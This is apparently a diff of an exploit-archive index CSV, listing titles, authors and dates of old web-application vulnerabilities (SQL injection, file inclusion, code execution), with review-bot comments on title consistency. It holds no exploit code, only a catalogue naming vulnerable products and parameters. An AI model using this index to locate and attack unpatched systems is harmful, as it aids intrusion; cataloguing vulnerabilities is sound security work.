6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' Parameter SQL Injection",2008-10-15,JosS,php,webapps,0
6762,platforms/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,php,webapps,0 6762,platforms/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,php,webapps,0
6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'category.php cid' SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'cid' Parameter SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0
6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,php,webapps,0 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,php,webapps,0
6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps,0 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps,0
6766,platforms/php/webapps/6766.txt,"PokerMax Poker League - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 6766,platforms/php/webapps/6766.txt,"PokerMax Poker League 0.13 - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0
6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0 6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - 'index.php' Local File Inclusion",2008-10-16,JosS,php,webapps,0
6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps,0 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps,0
6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps,0
6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0 6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure",2008-10-16,LMaster,php,webapps,0
6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps,0
6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0 6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion",2008-10-16,ZeN,php,webapps,0
6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0
6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - (kategorino) SQL Injection",2008-10-18,EcHoLL,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - SQL Injection",2008-10-18,EcHoLL,php,webapps,0
6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0
6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' Parameter SQL Injection",2008-10-18,"Hussin X",php,webapps,0
6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0
6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0
6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0
6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
6788,platforms/php/webapps/6788.txt,"yappa-ng 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 6788,platforms/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0
6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0
6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0
6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection",2008-10-19,girex,php,webapps,0 6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0
6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0 6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection",2008-10-20,boom3rang,php,webapps,0
6795,platforms/php/webapps/6795.txt,"XOOPS Module makale - SQL Injection",2008-10-20,EcHoLL,php,webapps,0 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps,0
6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0
6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0 6799,platforms/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' Parameter SQL Injection",2008-10-21,"Hussin X",php,webapps,0
6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection",2008-10-22,H!tm@N,php,webapps,0
6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0 6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - 'ajax.php' SQL Injection",2008-10-22,Xianur0,php,webapps,0
6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0 6811,platforms/php/webapps/6811.txt,"YDC - 'cat' Parameter SQL Injection",2008-10-22,"Hussin X",php,webapps,0
6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0 6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion",2008-10-23,Pepelux,php,webapps,0
6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0
6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0
6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - SQL Injection",2008-10-23,"CWH Underground",php,webapps,0
6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0
6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0
6822,platforms/php/webapps/6822.txt,"websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0 6822,platforms/php/webapps/6822.txt,"WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0
6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0
6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0
6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'url' Parameter SQL Injection",2008-10-24,yassine_enp,php,webapps,0
6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0
6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0
6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0
6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0
6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection",2008-10-26,boom3rang,php,webapps,0 6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps,0
6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - 'forum.php id' SQL Injection",2008-10-26,Hurley,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0
6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0
6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0
6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0
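Review bot: Row 6808 loses the word "Authenticated" when "LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection" becomes "LoudBlog 0.8.0a - 'ajax.php' SQL Injection", and that word is the only thing in the title telling a reader the issue needs a logged-in session. Keep it, for example "LoudBlog 0.8.0a - 'ajax.php' Authenticated SQL Injection", in line with row 32644, which carries "Authenticated" in its title. In the same hunk, 6819, 6842 and 6843 drop both the file and the parameter name, while 6796, 6839, 6844 and 6846 stay in the old form; apply one rule to all of them.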
@ -19748,7 +19749,7 @@ id,file,description,date,author,platform,type,port
6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0
6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0
6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0
6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - (category_id) Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0
6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0 6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0
6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0
6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0
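Review bot: Row 6852 gains the word "Parameter" ("'category_id' Parameter Blind SQL Injection"), but 6849 ("'id' SQL Injection") and 6854 ("'poll_id' SQL Injection") in the same hunk stay without it, although row 6802 received exactly that fix earlier in this commit. Either add "Parameter" to 6849 and 6854 here or leave a note that they are deferred. Row 6850 "(langage)" is also still in the parenthesised style.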
@ -20067,7 +20068,7 @@ id,file,description,date,author,platform,type,port
7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0
7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0
7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
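Review bot: Row 7235 "Jamit Job Board 3.x - (show_emp) Blind SQL Injection" has the same shape and the same author as the changed row 7238, yet it is left untouched, as are 7236 "(pageid)" and 7241 "(index.php m)". If the rule is "(x)" to "'x' Parameter", apply it to every matching row in the hunk so the index does not end up with both styles side by side.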
@ -20618,7 +20619,7 @@ id,file,description,date,author,platform,type,port
7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0
8002,platforms/php/webapps/8002.txt,"CafeEngine - 'index.php catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
@ -21422,7 +21423,7 @@ id,file,description,date,author,platform,type,port
9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0 9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0
9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0
@ -23353,7 +23354,7 @@ id,file,description,date,author,platform,type,port
13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0
13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0
13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0
13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0 13769,platforms/php/webapps/13769.txt,"CafeEngine 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0
13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0
13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0
13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0
@ -27559,8 +27560,8 @@ id,file,description,date,author,platform,type,port
25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0
25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0
25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0
25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0
25533,platforms/php/webapps/25533.txt,"Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0
25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0
25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0
